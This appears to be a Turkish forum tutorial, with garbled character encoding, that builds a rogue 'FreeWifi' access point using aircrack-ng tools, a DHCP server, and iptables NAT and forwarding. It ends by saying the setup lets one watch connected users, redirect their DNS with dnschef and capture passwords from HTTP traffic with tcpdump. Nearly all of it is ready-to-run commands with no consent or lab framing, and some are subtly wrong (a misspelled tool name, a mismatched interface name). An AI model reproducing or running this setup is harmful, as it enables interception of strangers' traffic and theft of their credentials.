Aircrack-ng Nedir?

Aircrack-ng, bir paket dinleyici veya WEP ve WPA/WPA2 þifrelerini kýran bir dedektör diyebiliriz. Aircrack aracýný kullanýrken bazý öðrenmemiz gereken komutlar var. Bunlar;

"airodump-ng" , "aireplay-ng" , "aircrack-ng" ve "airdecap-ng" bugün ki konumuzda göreceðimiz komutlar.



Aircrack ile Sahte Kablosuz Að Oluþturma

Terminalimizi açýp ilk komudumuz ile baþlayalým.

Kod:
ifconfig




WLAN14 Bizim að adaptörümüz demektir.

Þimdi sahte eriþim noktasý için að adaptörümüzü kullanalým ve airmon-ng aracýmýz ile sanal bir arayüz oluþturalým ve baðlantýmýzý baþlatalým.



Kod:
airmon-ng start wlan14


Artýk dinleme yapmayý veya sahte eriþim noktasý yapabilmek için að adaptörümüzu kullanabilirsiniz,
airmon-ng aracýyla sanal bir arayüz oluþturup ilgili baðlantýmýzý baþlatalým,

mon1 adýnda bir arayüz oluþtu test edelim bakalým etrafdaki kablosuz aðlarýmýz gözüküyor mu, Fakat onu yapmadan hata vermemesi için þu komutu yazalým,



Kod:
modprobe r8187se


Ardýndan mon1 arayüzümüzü test edelim,



Kod:
airodum-ng mon1


Bu aða baðlanýcak kiþilere ip verebilmek adýna DHCP sunucumuzu kuruyoruz



Kod:
apt-get install dhcp3-server


Yüklenmezse manuel bir þekilde indirmek için bu dosyayý indirin http://oemsources.volumio.org/brysto...-server.tar.gz

Ardýndan bu komudu yazalým



Kod:
tar -xvf isc-dhcp-server.tar.gz -C /test


.dep paketimiz yüklendikten sonra sistemi sonra yeniden baþlatalým.



Kod:
dpkg -i isc.dhcp.server.dep




Kod:
reboot


Sonra IP aralýðýný verebilmek için dhcp servisimizin conf dosyasýný düzenleyelim



Kod:
nano /etc/dhcp3/dhcpd.conf


ve direkt bu kýsmý copy-paste yapýn.

Alıntı:
ddns-update-style ad-hoc; //bu alaný daha sonradan servis çalýþmassa hata verirse kaldýracaðýz.
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}
Ardýndan airbase-ng komuduyla kablosuz aðý oluþturalým.



Kod:
airbase-ng -e FreeWifi -c 11 -v wlan1 &


at0 isimli bir sanal arabirim indirelimi



Kod:
ifconfig at0 up


Kod:
ifconfig at0 10.0.0.254 netmask 255.255.255.0


route komutunu yazalým,



Kod:
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254


iptable ayarlarýmýzý yapalým,



Kod:
iptables --flush


Kod:
iptables --table nat --flush


Kod:
iptables --delete-chain




Kod:
iptables -P FORWARD ACCEPT


gelecek baðlantýlarý yönlendirelim.



Kod:
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE


DHCP serverimizi baþlatalým,



Kod:
dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 &


geçiþ yapacak IP'lerimizi yönlendirelim.



Kod:
echo "1" > /proc/sys/net/ipv4/ip_forward
Bu adýmlara kadar geldikten sonra ilgili testleri yapýn. Bu sayede bir kullanýcýnýn IP'sini alýp onu izleyebilirsiniz dnschef ile dns yönlendirmesi yaparak ve tcpdump ile de http trafiðinde parola bilgilerini alabiliriz.